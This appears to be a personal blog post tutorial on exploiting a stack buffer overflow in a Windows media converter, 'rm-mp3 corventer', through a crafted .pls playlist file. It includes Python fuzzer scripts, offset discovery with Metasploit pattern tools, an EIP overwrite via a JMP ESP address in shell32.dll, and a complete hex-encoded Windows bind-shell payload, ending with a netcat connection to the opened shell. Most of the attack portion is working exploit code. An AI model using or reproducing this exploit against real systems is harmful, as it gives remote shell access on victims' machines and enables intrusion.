this article is about buffer overflow exploits, in this post i try to exploits rm-mp3 corventer. first i make a fuzzer with name mawarmerah.pls, its contain long url. script to make fuzzer as below:
#'/usr/bin/python
filename="malamterakhir.pls"
hancur='http://'
hancur+='\x41' * 35000;
file=open(filename,'w')
file.write(hancur)
print("hancurkan rek")
file.close()
after get file mawarmerah.pls, then run rm-mp3 corventer and open/load file mawarmerah.pls, i found the aplications automatic closed and may be this application got buffer overflow. to make sure what happened with rm-mp3 corventer i check using ollydbg and this result like this :
ollydbg showing that rm-mp3 corventer got buffer-overflow, which ESP and EIP register is overwriten with long url in mawarmerah.pls. after that search number of byte where register overwrited. i use pattern_create on metasploits framework to make structured data string, using command :
then edit fuzzer with character string which made using pattern_create
#'/usr/bin/python
filename="mawarmerah.pls"
hancur='http://'
hancur+='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7
Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8
Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0
Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai
1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak
5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6
Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6
Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6A
q7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8
As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4..............................'
file=open(filename,'w')
file.write(hancur)
print("hancurkan rek")
file.close()
then run rm-mp3 corventer through ollydbg again and open the fuzzer.
the result showing that EIP register is overwriten by 36696735, now search position of this character using pattern_offset
#'/usr/bin/python
filename="mawarmerah.pls"
hancur='http://'
hancur+='\x90' * 17417
hancur+='\xAA\xBB\xCC\xDD'
file=open(filename,'w')
file.write(hancur)
print("hancurkan rek")
file.close()
then run rm-mp3 corventer through ollydbg again and open the fuzzer.
result is showing that EIP overwritten with character are set in fuzzer.
after that check what stack can overwrite if stack can overwritten so we can input payload to stack, edit fuzzer again :
#'/usr/bin/python
filename="mawarmerah.pls"
hancur='http://'
hajar='\x90' * 17417
hajar+='\xAA\xBB\xCC\xDD'
hajar+='\x90' * (17425 - len(hajar))
hajar+='\xAA' * (35000 - len(hajar))
file=open(filename,'w')
file.write(hancur+hajar)
print("hancurkan rek")
file.close()
then run rm-mp3 corventer through ollydbg again and open the fuzzer.
because EIP register can't direct access into buffer-memory, i use JMP ESP command to direct EIP register to access payload in stack. open menu view -> executables module then search choose shell32.dll, then search JMP-ESP with right mouse click -> search for ->command
then make payload using msfweb on metasploits framework, on filter choose win 32, and then choose windows bind shell
result of generated payload
#'/usr/bin/python
filename="mawarmerah.pls"
hancur='http://'
hajar='\x90' * 17417
hajar+='\xD7\x30\x9D\x7C' #jmp esp address
hajar+='\x90' * 24
payload="\xda\xc2\xbb\x78\xf3\x93\xb4\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x51"
payload+="\x83\xc0\x04\x31\x58\x13\x03\x20\xe0\x71\x41\x2c\x6c\x9d\xe7\x24"
payload+="\x88\x9e\x07\x4b\x0b\xea\x94\x97\xe8\x67\x21\xeb\x7b\x0b\xaf\x6b"
payload+="\x7d\x1b\x24\xc4\x65\x68\x64\xfa\x94\x85\xd2\x71\xa2\xd2\xe4\x6b"
payload+="\xfa\x24\x7f\xdf\x79\x64\xf4\x18\x43\xaf\xf8\x27\x81\xdb\xf7\x1c"
payload+="\x51\x38\xd0\x17\xbc\xcb\x7f\xf3\x3f\x27\x19\x70\x33\xfc\x6d\xd9"
payload+="\x50\x03\x99\xe6\x44\x88\xd4\x84\xb0\x92\x87\x97\x88\x71\x23\x9c"
payload+="\xa8\xb5\x27\xe2\x22\x3d\x47\xfe\x97\xca\xe8\xf6\xb9\xa4\x66\x48"
payload+="\x48\xd9\x27\xab\x82\x47\x9b\x35\x43\xbb\x29\xd1\xe4\xc8\x7f\x7e"
payload+="\x5f\xd0\x50\xe8\x94\xc3\xad\xd3\x7a\xe3\x98\x7c\xf2\xfe\x43\x03"
payload+="\xe9\x09\x8e\x56\x98\x0b\x71\x88\x34\xd5\x84\xdd\x68\xb2\x69\xcb"
payload+="\x20\x6e\xc5\xa0\x95\xd3\xba\x05\x49\x2b\xec\xef\x05\xc6\xbe\x89"
payload+="\x86\x61\x21\xc0\x41\xd6\xb8\x9a\x56\x41\x42\x8c\x33\x7e\xed\x65"
payload+="\x3b\xae\x65\x21\x6e\x61\x9f\x7e\x8e\xa8\x0c\xd5\x8f\x85\xdb\x30"
payload+="\x26\xa0\x55\xed\x46\x7a\x35\x45\xed\xd6\x49\xb5\x9e\xb1\x52\x4c"
payload+="\x67\x38\xca\x51\xb1\xee\x0b\x7d\x58\x7b\x90\x1b\xcd\x18\x35\x6a"
payload+="\xe8\xb5\x95\x35\xda\x85\x9f\x22\x76\x52\x29\x4e\xb6\x9a\xda\x24"
payload+="\x47\x58\x30\xc6\xfa\x71\xd9\xbb\x81\xb1\x76\x68\xde\xaa\xfa\x90"
payload+="\x92\x3d\x04\x19\x91\xbe\x2c\xba\x4e\x13\x80\x6d\x20\xf9\x23\xdc"
payload+="\x93\xa8\x72\x21\xc3\x3b\xd8\x04\xe1\x75\x71\x49\x3c\xe3\x89\x4a"
payload+="\xf6\x0b\xa5\x3f\xae\x0f\xc5\xfb\x35\x0f\x1c\x51\x49\x3f\xc9\x2b"
payload+="\x6d\x22\x79\x80\x72\x75\x81\xf6"
file=open(filename,'w')
file.write(hancur+hajar+payload)
print("hancurkan rek")
file.close()
then run rm-mp3 corventer without through ollydbg, and open the fuzzer again, i found rm-mp3 corventer got crash
then from my backtrack run nc on terminal console
finished,, exploits success,,,
No comments:
Post a Comment